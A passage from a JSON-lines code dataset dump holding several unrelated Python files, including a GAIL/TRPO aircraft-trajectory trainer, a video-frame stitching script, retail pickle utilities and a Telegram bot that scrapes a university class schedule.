\"u-component_of_wind_isobaric,v-component_of_wind_isobaric,drct,sknt,alti,vsby,gust,mode\" +\n \"\\n\")\n action_results.write(\"episode,dlon,dlat,dalt\\n\")\n\n actions = []\n obs = []\n discounted_rewards = []\n total_rewards = []\n print('Episodes,Reward')\n self.init = True\n\n for i_episode in range(episode_num):\n self.counter2 = 0\n self.plot_test_latent_var = []\n self.plot_i_test = []\n steps = 0\n r_i = []\n norm_observation, observation = self.env.reset()\n obs_unormalized = unnormalize_observation_metar(observation)\n #print('obs:', observation)\n dec_input1, latent_init, arg = self.init_encoder(observation)\n\n line = \"\"\n for ob in obs_unormalized:\n line += \",\" + str(ob)\n line += \",\" + str(arg)\n results.write(str(i_episode) + line + \"\\n\")\n\n total_reward = 0\n\n for t in range(1000):\n if self.init:\n #print('latent:', latent_init)\n #print('dec_input:', dec_input1)\n obs.append(dec_input1)\n action = self.act_test(dec_input1)\n action = action.tolist()\n else:\n obs.append(dec_input2)\n action = self.act_test(dec_input2)\n action = action.tolist()\n\n self.counter2 += 1\n\n norm_observation2, observation2, reward, done = self.env.step(action, t)\n # print('obs2:',observation2)\n\n if self.init:\n dec_input2, latent, arg = self.new_encoder(observation2, latent_init)\n # print('latent:',latent)\n # print('dec_in2:',dec_input2)\n else:\n dec_input2, latent, arg = self.new_encoder(observation2, latent)\n # print('latent_2:',latent)\n # print('dec_in2_2:',dec_input2)\n\n steps += 1\n r_i.append(reward)\n actions.append(action)\n total_reward += reward\n action = unnormalize_action(action)\n obs_unormalized2 = unnormalize_observation_metar(observation2)\n\n self.plot_i_test.append(t)\n self.init = False\n if t % 100 == 0:\n print(\"%i/%i\" % (t + 100, 1000))\n if t >= 1000 or done:\n # if done:\n # print('')\n # exit(0)\n # continue\n\n np1 = np.asarray(self.plot_i_test)\n np2 = np.asarray(self.plot_test_latent_var)\n print('np1_s:', np1.size)\n print('np2_s:', np2.size)\n #self.plot_vae_test(self.plot_i_test, self.plot_test_latent_var, i_episode)\n break\n else:\n line = \"\"\n for ob in obs_unormalized2:\n line += \",\" + str(ob)\n line += \",\" + str(arg)\n results.write(str(i_episode) + line + \"\\n\")\n action_results.write(\n str(i_episode) + \",\" + str(action[0]) + \",\" + str(action[1]) + \",\" + str(action[2]) + \"\\n\")\n\n print('{0},{1}'.format(i_episode, total_reward))\n # exit(0)\n discounted_rewards.extend(discount(r_i, 0.995))\n total_rewards.append(total_reward)\n\n # self.env.close()\n # self.sess.close()\n return actions, obs, discounted_rewards, total_rewards\n else:\n out_file = myconfig['output_dir']+'/exp'+str(myconfig['exp'])+'_'+fname+'_D-Info_GAIL_results(Metar-5modes).csv'\n action_out_file = myconfig['output_dir'] + '/exp'+str(myconfig['exp'])+'_'+fname+'_D-Info_GAIL_actions_results(Metar-5modes).csv'\n\n enc_saver = tf.train.Saver(self.model2.weights)\n enc_saver.restore(self.sess, \"VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/encoder/encoder_model_e2000.ckpt\") # run2(batch-32-modes3)\n saver = tf.train.Saver(self.model.weights)\n saver.restore(self.sess, myconfig['output_dir']+'output/exp'+myconfig['exp']+\"model.ckpt\")\n\n with open(out_file, 'w') as results, open(action_out_file, 'w') as action_results:\n results.write(\"episode,longitude,latitude,altitude,timestamp,Pressure_surface,\"\n \"Relative_humidity_isobaric,Temperature_isobaric,Wind_speed_gust_surface,\"\n \"u-component_of_wind_isobaric,v-component_of_wind_isobaric,drct,sknt,alti,vsby,gust,mode\" +\n \"\\n\")\n action_results.write(\"episode,dlon,dlat,dalt\\n\")\n\n actions = []\n obs = []\n i = []\n discounted_rewards = []\n total_rewards = []\n print('Episodes,Reward')\n self.init = True\n\n for i_episode in range(episode_num):\n self.counter2 = 0\n self.plot_test_latent_var = []\n self.plot_i_test = []\n steps = 0\n r_i = []\n norm_observation, observation = self.env.reset()\n obs_unormalized = unnormalize_observation_metar(observation)\n #print('obs:', observation)\n dec_input1, latent_init, arg = self.init_encoder(observation)\n\n line = \"\"\n for ob in obs_unormalized:\n line += \",\" + str(ob)\n line += \",\" + str(arg)\n results.write(str(i_episode) + line + \"\\n\")\n\n total_reward = 0\n\n for t in range(1000):\n if self.init:\n #print('latent:', latent_init)\n #print('dec_input:', dec_input1)\n obs.append(dec_input1)\n action = self.act_test(dec_input1)\n action = action.tolist()\n else:\n obs.append(dec_input2)\n action = self.act_test(dec_input2)\n action = action.tolist()\n\n self.counter2 += 1\n\n norm_observation2, observation2, reward, done = self.env.step(action, t)\n # print('obs2:',observation2)\n\n if self.init:\n dec_input2, latent, arg = self.new_encoder(observation2, latent_init)\n # print('latent:',latent)\n # print('dec_in2:',dec_input2)\n else:\n dec_input2, latent, arg = self.new_encoder(observation2, latent)\n # print('latent_2:',latent)\n # print('dec_in2_2:',dec_input2)\n\n steps += 1\n r_i.append(reward)\n actions.append(action)\n total_reward += reward\n action = unnormalize_action(action)\n obs_unormalized2 = unnormalize_observation_metar(observation2)\n\n self.plot_i_test.append(t)\n self.init = False\n if t % 100 == 0:\n print(\"%i/%i\" % (t + 100, 1000))\n if t >= 1000 or done:\n # if done:\n # print('')\n # exit(0)\n # continue\n\n np1 = np.asarray(self.plot_i_test)\n np2 = np.asarray(self.plot_test_latent_var)\n print('np1_s:', np1.size)\n print('np2_s:', np2.size)\n self.plot_vae_test(self.plot_i_test, self.plot_test_latent_var, i_episode, '/VAE/results_gumbel_softmax/plot/aviation/epoch{}_aviation_latents.png')\n break\n else:\n line = \"\"\n for ob in obs_unormalized2:\n line += \",\" + str(ob)\n line += \",\" + str(arg)\n results.write(str(i_episode) + line + \"\\n\")\n action_results.write(\n str(i_episode) + \",\" + str(action[0]) + \",\" + str(action[1]) + \",\" + str(action[2]) + \"\\n\")\n\n print('{0},{1}'.format(i_episode, total_reward))\n # exit(0)\n discounted_rewards.extend(discount(r_i, 0.995))\n total_rewards.append(total_reward)\n\n # self.env.close()\n # self.sess.close()\n return actions, obs, discounted_rewards, total_rewards\n\n def rollout(self, mini_batch, latent_sequence_np):\n not_enough_samples = True\n batch_actions = []\n batch_observations = []\n batch_observations_lat = []\n batch_total_env_rewards = []\n log_observations = []\n log_actions = []\n episode = 0\n samples = 0\n global index\n global index2\n global counter_idx\n global indexing_csv\n\n if mini_batch == 0:\n indexing_csv = pd.read_csv('../../../aviation-indexing.csv')\n indexing_csv = np.asarray(indexing_csv).tolist()\n #indexing_csv = indexing_csv.tolist()\n\n index = 0\n index2 = indexing_csv[0][0]\n #print('index2:', index2)\n counter_idx = 0\n\n while not_enough_samples:\n episode += 1\n self.total_episodes += 1\n actions = []\n observations = []\n observations_lat = []\n raw_observation, observation = self.env.reset()\n total_env_reward = 0\n #print('index:', index, 'index2:', index2)\n latent_sequence = latent_sequence_np[index:index2]\n #print(latent_sequence)\n seq_end = len(latent_sequence)\n #print('seq_len:', seq_end)\n\n for t in range(self.path_size):\n #if (t>0):\n # print('self.counter:', self.counter, 'done:', done, 'seq_size:', seq_end)\n action, _ = self.act(observation, latent_sequence)\n action = action.tolist()\n observation_lat = obs_matrix.tolist()\n observations.append(observation)\n observations_lat.append(observation_lat)\n\n if mini_batch % 100 == 0:\n #log_observation = copy.deepcopy(raw_observation)\n #log_observation.append(episode)\n log_observation = observation_lat + [episode]\n log_observations.append(log_observation)\n log_action = copy.deepcopy(action)\n log_action = np.append(log_action, episode)\n log_actions.append(log_action)\n\n raw_observation, observation, reward_env, done = self.env.step(action, t)\n\n total_env_reward += reward_env\n\n actions.append(action)\n\n if t % 100 == 0:\n #print(\"%i/%i\" % (t + 100, self.path_size))\n continue\n if (self.counter == seq_end) or done:\n # print('DONE2')\n # print('timestep:', t)\n self.counter = 0\n counter_idx += 1\n index = index2\n index2 += indexing_csv[counter_idx][0]\n if (index2 >= 327071):\n index = 0\n index2 = indexing_csv[0][0]\n counter_idx = 0\n break\n\n samples += len(actions)\n batch_observations.append(observations)\n batch_observations_lat.append(observations_lat)\n batch_actions.append(actions)\n batch_total_env_rewards.append(total_env_reward)\n if samples >= self.mini_batch_size:\n not_enough_samples = False\n self.counter = 0\n\n if mini_batch % 100 == 0:\n np.savetxt(myconfig['exp']+'_'+str(mini_batch)+\"_observation_log.csv\", np.asarray(log_observations)\n , delimiter=',', header='longitude,latitude,altitude,timestamp,'+\n 'Pressure_surface,Relative_humidity_isobaric,'+\n 'Temperature_isobaric,Wind_speed_gust_surface,'+\n 'u-component_of_wind_isobaric,'+\n 'v-component_of_wind_isobaric,'+\n 'drct,sknt,alti,vsby,gust,'+'latent1,latent2,latent3,episode'\n , comments='')\n np.savetxt(myconfig['exp']+'_'+str(mini_batch) + \"_action_log.csv\", np.asarray(log_actions),\n delimiter=',', header='dlon,dlat,dalt,episode', comments='')\n\n return batch_observations_lat, batch_observations, batch_actions, batch_total_env_rewards\n\n def run_clonos(self, observation, init_latent):\n print('Running.. Encoder Clone')\n global global_concat_test1\n state = 0\n latent_counter = 1\n latent_flag = True\n init_latent = np.asarray(init_latent)\n while state < 327072:\n #print('state:', state)\n #if (latent_counter % 1000 == 0 or latent_counter == 1):\n if (latent_counter == 1):\n latent_flag = True\n else:\n latent_flag = False\n # print('counter:', counter, 'flag:', latent_flag)\n\n if (latent_flag == True):\n enc_input = np.concatenate((np.asarray(observation[state]), init_latent))\n else:\n enc_input = np.concatenate((np.asarray(observation[state]), global_concat_test1))\n\n latent_prob = self.sess.run(self.encoder_logits, feed_dict={self.encoder_x: [enc_input]})[0]\n self.latent_sequence_prob.append(latent_prob)\n latent_prob = np.asarray(latent_prob)\n latent_new, argmax = self.one_hot_encoding(latent_prob)\n self.latent_sequence1.append(latent_new)\n sequence_prob = self.latent_sequence_prob\n sequence = self.latent_sequence1\n #print(latent_new)\n #print(sequence_prob[state])\n #print(sequence[state])\n # print(sequence)\n global_concat_test1 = latent_new\n state += 1\n latent_counter += 1\n self.latent_sequence_list = copy.deepcopy(self.latent_sequence1)\n np_arr_prob = np.asarray(self.latent_sequence_prob)\n np_arr = np.asarray(self.latent_sequence1)\n print(np_arr_prob.shape)\n print(np_arr.shape)\n print('Encoder Clone finished, mode sequences were created successfully!')\n #latent_sequence_prob_pd = pd.DataFrame(self.latent_sequence_prob, columns=['latent1', 'latent2', 'latent3'])\n #latent_sequence_pd = pd.DataFrame(self.latent_sequence1, columns=['latent1', 'latent2', 'latent3'])\n #latent_sequence_prob_pd.to_csv('./expert_data/latent_sequence_prob.csv', index=False)\n #latent_sequence_pd.to_csv('./expert_data/latent_sequence.csv', index=False)\n\n return np_arr_prob, np_arr\n\n def train(self, expert_observations, expert_actions):\n \"\"\"\n Trains the agent.\n :return: void\n \"\"\"\n\n encoder_saver = tf.train.Saver(self.model2.weights)\n encoder_saver.restore(self.sess,\"./VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/encoder/encoder_model_e2000.ckpt\")\n saver = tf.train.Saver(self.model.weights)\n # saver.restore(self.sess, \"./checkpoint/bcloning.ckpt\")\n saver.restore(self.sess, \"./VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/decoder/decoder_model_e2000.ckpt\")\n discriminator_saver = tf.train.Saver(self.discriminator.discriminate.weights)\n\n latent_sequence_prob_np, latent_sequence_np = self.run_clonos(expert_observations, init_latent=[1., 0., 0., 0., 0.])\n latent_sequence_np = latent_sequence_np.tolist()\n latent_sequence_prob_np = latent_sequence_prob_np.tolist()\n\n print('Batches,Episodes,Surrogate,Reward,Env Reward')\n for mini_batch in range(self.mini_batches+1):\n\n # expert_observations_batch, expert_actions_batch = self.replay_buffer.get_batch(self.mini_batch_size)\n expert_observations_batch = expert_observations\n expert_actions_batch = expert_actions\n\n batch_observations_lat, batch_observations, batch_actions, batch_total_env_rewards = self.rollout(mini_batch, latent_sequence_np)\n\n flat_actions = [a for actions in batch_actions for a in actions]\n flat_observations = [o for observations in batch_observations_lat for o in observations]\n\n flat_actions = np.asarray(flat_actions, dtype=np.float64)\n flat_observations = np.asarray(flat_observations, dtype=np.float64)\n print('len:', len(flat_observations))\n flat_observations2 = flat_observations[:, :15]#4, 10, 15\n\n if mini_batch < self.mini_batches:\n d_loss_before_train, discriminator_loss = self.discriminator.train(expert_observations_batch, expert_actions_batch,\n flat_observations2[:self.mini_batch_size],\n flat_actions[:self.mini_batch_size])\n else:\n print('discriminator train not')\n\n batch_total_rewards = []\n batch_discounted_rewards_to_go = []\n batch_advantages = []\n total_reward = 0\n global d\n d = 0\n counters = 0\n index_rew = 0\n index_rew2 = 0\n for (observations, actions, obs_lat) in zip(batch_observations, batch_actions, batch_observations_lat):\n counters += len(observations)\n rewards_q, argmax_q = self.predict(np.asarray(obs_lat))\n # print('len:', len(rewards_q))\n # argmax_q = [np.argmax(i) for i in rewards_q]\n rewards_q = np.asarray(rewards_q)\n # print('rewards_q: \\n', rewards_q)\n # print('argmax:', argmax_q)\n # print('len_argmax:', len(argmax_q))\n\n argmax_q2 = []\n for reward_q, i in zip(rewards_q, argmax_q):\n element = reward_q[i]\n argmax_q2.append(element)\n\n # print('argmax2:', argmax_q2)\n # print('len_argmax2:', len(argmax_q2))\n\n rewards_log = [np.log(i) for i in argmax_q2]\n # print('rewards_log:', rewards_log)\n # print('len_rew_log:', len(rewards_log))\n\n rewards_q2 = np.asarray([[i * 0.01] for i in rewards_log])\n #print('rewards_q:', rewards_q2)\n # print('len_rew_q:', len(rewards_q2))\n\n reward_t = -self.discriminator.predict(np.array(observations), np.array(actions))\n #print('rewards_t:', reward_t)\n # print('len_rew_t:', len(reward_t))\n # reward_t = [[i+t for i,t in zip(y, e)] for (y, e) in zip(reward_t, rewards_q2)]\n # print('reward_t_len:', len(reward_t), 'reward_q_len:', len(rewards_q2))\n # reward_t = reward_t + rewards_q2\n # print('reward_t_len:', len(reward_t))\n\n\n reward_t = np.asarray([i + j for i, j in zip(reward_t, rewards_q2)])\n #reward_t = [(sum(i,j)).tolist() for i,j in zip(reward_t, rewards_q2)]\n\n #print('rewards_t-after:', reward_t, '\\n, type:', type(reward_t))\n #print('rewards_t-after:', reward_t)\n\n total_reward += np.sum(reward_t)\n batch_total_rewards.append(total_reward)\n reward_t = (reward_t.flatten())\n #print('flatten:', reward_t)\n discount_r = discount(reward_t, self.gamma)\n #print('discount:', discount_r)\n batch_discounted_rewards_to_go.extend(discount_r)\n obs_episode_np = np.array(observations)\n v = np.array(self.critic.predict(obs_episode_np)).flatten()\n v_next = shift(v, -1, cval=0)\n undiscounted_advantages = reward_t + self.gamma * v_next - v\n #print('undiscount:', undiscounted_advantages)\n\n discounted_advantages = discount(undiscounted_advantages, self.gamma * self.lamda)\n\n batch_advantages.extend(discounted_advantages)\n\n discounted_rewards_to_go_np = np.array(batch_discounted_rewards_to_go)\n discounted_rewards_to_go_np.resize((self.mini_batch_size, 1))\n\n observations_np = np.array(flat_observations2, dtype=np.float64) #10\n observations_np2 = np.array(flat_observations, dtype=np.float64) #13\n observations_np.resize((self.mini_batch_size, self.observation_dimensions))\n observations_np2.resize((self.mini_batch_size, self.observation_dimensions + self.latent_dimensions))\n\n advantages_np = np.array(batch_advantages)\n advantages_np.resize((self.mini_batch_size,))\n\n actions_np = np.array(flat_actions, dtype=np.float64).flatten()\n actions_np.resize((self.mini_batch_size, self.action_dimensions))\n\n self.critic.train(observations_np, discounted_rewards_to_go_np)\n feed = {self.x: observations_np2,\n self.actions_ph: actions_np,\n self.advantages_ph: advantages_np,\n self.old_log_prob_ph: self.sess.run([self.log_prob], feed_dict={self.x: observations_np2, self.actions_ph: actions_np})\n }\n\n g = np.array(self.sess.run([self.flat_grad],feed_dict=feed)[0],dtype=np.float64)\n step_dir = conjugate_gradient(self.__fisher_vector_product, g, feed)\n fvp = self.__fisher_vector_product(step_dir, feed)\n shs = step_dir.dot(fvp)\n assert shs > 0\n fullstep = np.sqrt(2 * self.max_kl / shs) * step_dir\n\n def loss_f(theta, mu_old):\n \"\"\"\n Computes surrogate and KL of weights theta, used in\n line search.\n :param theta: Weights.\n :param mu_old: Distribution of old weights.\n :return: Vector [surrogate,KL]\n \"\"\"\n feed[self.theta_ph] = theta\n feed[self.mu_old_ph] = mu_old\n self.sess.run([self.sff], feed_dict=feed)\n return self.sess.run(self.losses, feed_dict=feed)\n\n surrogate_run = self.sess.run(self.surrogate, feed_dict=feed)\n\n mu_old_run = self.sess.run(self.logits, feed_dict={self.x: observations_np2})\n theta_run = np.array(self.sess.run([self.flat_vars], feed_dict={})[0], dtype=np.float64)\n\n theta_new, surrogate_run = line_search(loss_f, theta_run,\n fullstep, mu_old_run,\n g.dot(step_dir),\n surrogate_run,\n self.max_kl)\n\n feed[self.theta_ph] = theta_new\n feed[self.step_direction] = step_dir\n _ = self.sess.run([self.sff], feed_dict=feed)\n if mini_batch % 10 == 0:\n _, summary = self.sess.run([self.step_direction, self.merged], feed_dict=feed)\n self.train_writer.add_summary(summary, mini_batch)\n\n self.episode_history.append(np.mean(batch_total_env_rewards))\n # mean = np.mean(self.episode_history)\n # if mean > max_mean:\n # max_mean = mean\n # saver.save(self.sess, myconfig['output_dir']+\"output/exp\"+str(myconfig['exp'])+\"model.ckpt\")\n\n print('{0},{1},{2},{3},{4},{5},{6}'.format(mini_batch, self.total_episodes,\n surrogate_run,np.mean(batch_total_rewards)\n ,np.mean(batch_total_env_rewards), d_loss_before_train, discriminator_loss))\n\n if mini_batch % 100 == 0:\n # encoder_saver.save(self.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"encoder_model.ckpt\", global_step=mini_batch)\n saver.save(self.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"model.ckpt\", global_step=mini_batch)\n discriminator_saver.save(self.discriminator.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"discriminator.ckpt\", global_step=mini_batch)\n\n # encoder_saver.save(self.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"encoder_model.ckpt\")\n saver.save(self.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"model.ckpt\")\n discriminator_saver.save(self.discriminator.sess, myconfig['output_dir'] + \"output/exp\" + str(myconfig['exp']) + \"discriminator.ckpt\")\n","sub_path":"Diplwmatikh projects/AircraftTrajectories_D_Info_GAIL/Dir_Info_GAIL/METAR/5modes/trpo.py","file_name":"trpo.py","file_ext":"py","file_size_in_byte":45589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"539709321","text":"import tornado.ioloop\nimport tornado.web\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n type='python'\n html=\"\"\"\n\n
\n \n \n \"\"\" % type\n self.write(html)\n\napplication = tornado.web.Application([\n (r\"/\", MainHandler),\n])\n\nif __name__ == \"__main__\":\n application.listen(9999)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"538969599","text":"import sys\nimport argparse\nimport cv2\nfrom PIL import Image\nimport numpy as np\n\ndef getFrames():\n frames = []\n vidcap = cv2.VideoCapture('./test4.mp4')\n success,image = vidcap.read()\n fps = int(round(vidcap.get(cv2.CAP_PROP_FPS) / 4)) # Gets the frames per second\n counter = 0\n lastFrame = 0\n total = 0\n avg_counter = 0\n while success:\n success, image = vidcap.read()\n if(success):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n fm = cv2.Laplacian(gray, cv2.CV_64F).var()\n total = total + fm\n avg_counter = avg_counter + 1\n\n vidcap = cv2.VideoCapture('./test4.mp4')\n success,image = vidcap.read()\n while success:\n counter = counter + 1\n frameId = int(round(vidcap.get(1))) #current frame number, rounded b/c sometimes you get frame intervals which aren't integers...this adds a little imprecision but is likely good enough\n success, image = vidcap.read()\n if(success):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n fm = cv2.Laplacian(gray, cv2.CV_64F).var()\n if(fm > (total/(avg_counter + (avg_counter *0.1))) and lastFrame + 4 < counter):\n lastFrame = counter\n print(\"added \" + str(frameId))\n frames.append(image)\n\n vidcap.release()\n return frames\n\nprint(\"[INFO] Getting frames...\")\nimages = []\nfor frame in getFrames():\n img = Image.fromarray(frame, 'RGB')\n images.append(frame)\n\n# img.show()\nprint(\"[INFO] Stitching images...\")\nstitcher = cv2.Stitcher_create(1)\n\n(status, stitched) = stitcher.stitch(images)\n\nif status != 0:\n print(\"[ERR] Can't stitch images, error code = %d\" % status)\n sys.exit(-1)\n\nprint(\"[INFO] Writing new image...\")\ncv2.imwrite(\"./rcaefwa.jpg\", stitched)\nprint(\"[INFO] Done\")","sub_path":"documentation/demo_tools/video_stitching_tool/old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503800041","text":"import requests\r\nfrom datetime import datetime\r\nfrom bs4 import BeautifulSoup\r\nimport telebot\r\n\r\n\r\naccess_token = \"ADD YOUR TOKEN HERE\"\r\ntelebot.apihelper.proxy = {'http':'http://10.10.1.10:3128'}\r\n\r\nbot = telebot.TeleBot(access_token)\r\n\r\nwork_days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']\r\ndomain = \"http://www.ifmo.ru/ru/schedule/0/\"\r\n\r\ndef get_page(group: str, week=''):\r\n if week:\r\n week = str(week) + '/'\r\n url = f'{domain}/{group}/{week}raspisanie_zanyatiy_{group}.htm'\r\n response = requests.get(url)\r\n web_page = response.text\r\n return web_page\r\n\r\n\r\ndef parse_schedule_for_any_day(web_page, day):\r\n soup = BeautifulSoup(web_page, \"html5lib\")\r\n\r\n # Получаем таблицу с расписанием на понедельник\r\n index = str(work_days.index(day) + 1)\r\n index += \"day\"\r\n schedule_table = soup.find(\"table\", attrs={\"id\": index})\r\n\r\n # Время проведения занятий\r\n if schedule_table is None:\r\n return None\r\n times_list = schedule_table.find_all(\"td\", attrs={\"class\": \"time\"})\r\n times_list = [times.span.text for times in times_list]\r\n\r\n # Место проведения занятий\r\n locations_list = schedule_table.find_all(\"td\", attrs={\"class\": \"room\"})\r\n locations_list = [room.span.text for room in locations_list]\r\n\r\n # Название дисциплин и имена преподавателей\r\n lessons_list = schedule_table.find_all(\"td\", attrs={\"class\": \"lesson\"})\r\n lessons_list = [lesson.text.split('\\n\\n') for lesson in lessons_list]\r\n lessons_list = [', '.join([info for info in lesson_info if info]) for lesson_info in lessons_list]\r\n\r\n return times_list, locations_list, lessons_list\r\n\r\n\r\n@bot.message_handler(commands=['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday'])\r\ndef get_schedule(message):\r\n \"\"\" Получить расписание на указанный день \"\"\"\r\n day, group = message.text.split()\r\n web_page = get_page(group)\r\n resp = ''\r\n day = day[1].upper() + day[2:]\r\n if parse_schedule_for_any_day(web_page, day) is None:\r\n bot.send_message(message.chat.id, 'The system is currently unavailable. Please try back later.',\r\n parse_mode='HTML')\r\n return None\r\n times_lst, locations_lst, lessons_lst = \\\r\n parse_schedule_for_any_day(web_page, day)\r\n if times_lst:\r\n for _time, location, lession in zip(times_lst, locations_lst, lessons_lst):\r\n resp += '{}, {}, {}\\n'.format(_time, location, lession)\r\n bot.send_message(message.chat.id, resp, parse_mode='HTML')\r\n else:\r\n bot.send_message(message.chat.id, 'No classes today, Trang')\r\n\r\n\r\n@bot.message_handler(commands=['near'])\r\ndef get_near_lesson(message):\r\n \"\"\" Получить ближайшее занятие \"\"\"\r\n _, group = message.text.split()\r\n web_page = get_page(group)\r\n today = datetime.now()\r\n _date = today.weekday()\r\n if _date != 6:\r\n if parse_schedule_for_any_day(web_page, work_days[_date]) is None:\r\n bot.send_message(message.chat.id, 'The system is currently unavailable. Please try back later.',\r\n parse_mode='HTML')\r\n return None\r\n times_lst, locations_lst, lessons_lst = \\\r\n parse_schedule_for_any_day(web_page, work_days[_date])\r\n for i in range(len(times_lst)):\r\n t1 = times_lst[i][0:5]\r\n t1 = datetime.strptime(t1, '%H:%M')\r\n if today.time() < t1.time():\r\n result = '{}, {}, {}\\n'.format(times_lst[i], locations_lst[i], lessons_lst[i])\r\n bot.send_message(message.chat.id, result, parse_mode='HTML')\r\n return None\r\n\r\n if _date == 6:\r\n _date = 0\r\n\r\n for i in range(_date, 5):\r\n if parse_schedule_for_any_day(web_page, work_days[_date]) is None:\r\n bot.send_message(message.chat.id, 'The system is currently unavailable. Please try back later.',\r\n parse_mode='HTML')\r\n break\r\n times_lst, locations_lst, lessons_lst = \\\r\n parse_schedule_for_any_day(web_page, work_days[_date])\r\n if times_lst:\r\n result = '{}, {}, {}\\n'.format(times_lst[0], locations_lst[0], lessons_lst[0])\r\n bot.send_message(message.chat.id, result, parse_mode='HTML')\r\n break\r\n\r\n\r\n@bot.message_handler(commands=['tomorrow'])\r\ndef get_tommorow(message):\r\n \"\"\" Получить расписание на следующий день \"\"\"\r\n _, group = message.text.split()\r\n web_page = get_page(group)\r\n tomorrow = datetime.now().weekday() + 1\r\n resp = ''\r\n\r\n if tomorrow == 6:\r\n bot.send_message(message.chat.id, 'No classes tomorrow, Trang', parse_mode='HTML')\r\n return None\r\n if tomorrow == 7:\r\n tomorrow = 0\r\n times_lst, locations_lst, lessons_lst = \\\r\n parse_schedule_for_any_day(web_page, work_days[tomorrow])\r\n if times_lst:\r\n for _time, location, lession in zip(times_lst, locations_lst, lessons_lst):\r\n resp += '{}, {}, {}\\n'.format(_time, location, lession)\r\n bot.send_message(message.chat.id, resp, parse_mode='HTML')\r\n else:\r\n bot.send_message(message.chat.id, 'No classes tomorrow, Trang', parse_mode='HTML')\r\n\r\n\r\n@bot.message_handler(commands=['all'])\r\ndef get_all_schedule(message):\r\n \"\"\" Получить расписание на всю неделю для указанной группы \"\"\"\r\n _, group = message.text.split()\r\n web_page = get_page(group)\r\n for day in work_days:\r\n resp = ''\r\n if parse_schedule_for_any_day(web_page, day) is None:\r\n bot.send_message(message.chat.id, 'The system is currently unavailable. Please try back later.',\r\n parse_mode='HTML')\r\n break\r\n times_lst, locations_lst, lessons_lst = \\\r\n parse_schedule_for_any_day(web_page, day)\r\n\r\n if times_lst:\r\n for _time, location, lession in zip(times_lst, locations_lst, lessons_lst):\r\n resp += '{}, {}, {}\\n'.format(_time, location, lession)\r\n bot.send_message(message.chat.id, resp, parse_mode='HTML')\r\n\r\n\r\nif __name__ == '__main__':\r\n bot.polling()\r\n","sub_path":"homework05/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"505166479","text":"import pickle\nimport pandas as pd\nimport os\n\nPATH = os.path.join(os.path.dirname( __file__ ), 'pickle_data/')\n\n\ndef creat_and_dump_dataframe(data, category, client_id):\n dics = None\n if category == 'sales':\n dics = [\n {'Sales_id':row[0], \n 'Datetimestamp': row[1], \n 'Item_code': row[2], \n 'Item_name': row[3], \n 'Sale_quantity': float(row[4]),\n 'Unitcost_price': float(row[5]), \n 'Unitsale_price': float(row[6]), \n 'Total_sales': float(row[7])\n } for row in data[1:]]\n elif category == 'item':\n dics = [\n {'Item_code': row[0],\n 'Item_name': row[1],\n 'Category' : row[2],\n 'Sub_category':row[3] \n } for row in data[1:]]\n \n df = pd.DataFrame(dics)\n #print(df.dtypes)\n df.to_pickle(PATH + f'{client_id}_{category}.pkl')\n\ndef read_dataframe_from_pickle(client_id, data_name):\n df = pd.read_pickle(PATH + f'{client_id}_{data_name}.pkl')\n return df\n\n \n\ndef delete_client_pickle_files(client_id):\n \n files = [PATH+f'{client_id}_item2idx.pkl', \n PATH+f'{client_id}_idx2item.pkl' , \n PATH+f'{client_id}_code2name.pkl',\n PATH+f'{client_id}_top20_items_on_sales.pkl',\n PATH + f'{client_id}_sales.pkl',\n PATH + f'{client_id}_item.pkl',\n PATH + f'{client_id}_propeht_model.plk']\n for fl in files:\n if os.path.isfile(fl):\n os.remove(fl)\n return {'deleted_pickle':True}\n \n ","sub_path":"AAP/source/code/modules/retail/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"245263863","text":"import string\n\ngenus_name=\"listeria\"\n\n#for bool:\nsteady_withing_genus_but_not_distinguished=\"#\"\nsteady_withing_genus_and_distinguised=\"V\"\nresult_line_bool=\"\"\n\n#for count:\nnot_steady_position_within_genus=\"@\"\nresult_line_count=\"\"\n\n\ndef checkingIfSteadyWithinGenus(listeria_db):\n\tglobal position_steady_within_listeria\n\tglobal listeria_base\n\tglobal index_char\n\n\tposition_steady_within_listeria=True\n\tlisteria_base = listeria_db[0][index_char]\t\t\t# the of the first line of listeria db\n\n\t#go over all the listeria's lines:\n\tfor line in listeria_db :\n\t\tif line[index_char] != listeria_base:\n\t\t\tposition_steady_within_listeria = False\n\t\t\tbreak\n\t\t\t\t\ndef addResultAsBoolian(other_db):\n\tglobal result_line_bool\n\tglobal result_file\n\t\n\t#CALCULATING RESULTS\n\tdistinguished=True\n\tfor line in other_db :\n\t\tif line[index_char] == listeria_base:\n\t\t\tdistinguished = False\n\t\t\tbreak\n\t# PRINTING THE RESULTS TO RESULT STRING\n\tif distinguished:\t\t\n\t\t#CONSERVED:\n\t\t\n\t\t# result_file.write( listeria_base )\t\t#for debugging\n\t\tresult_line_bool += listeria_base\n\telse:\n\t\t# result_file.write( steady_withing_genus_but_not_distinguished )\t\t#for debugging\n\t\tresult_line_bool += 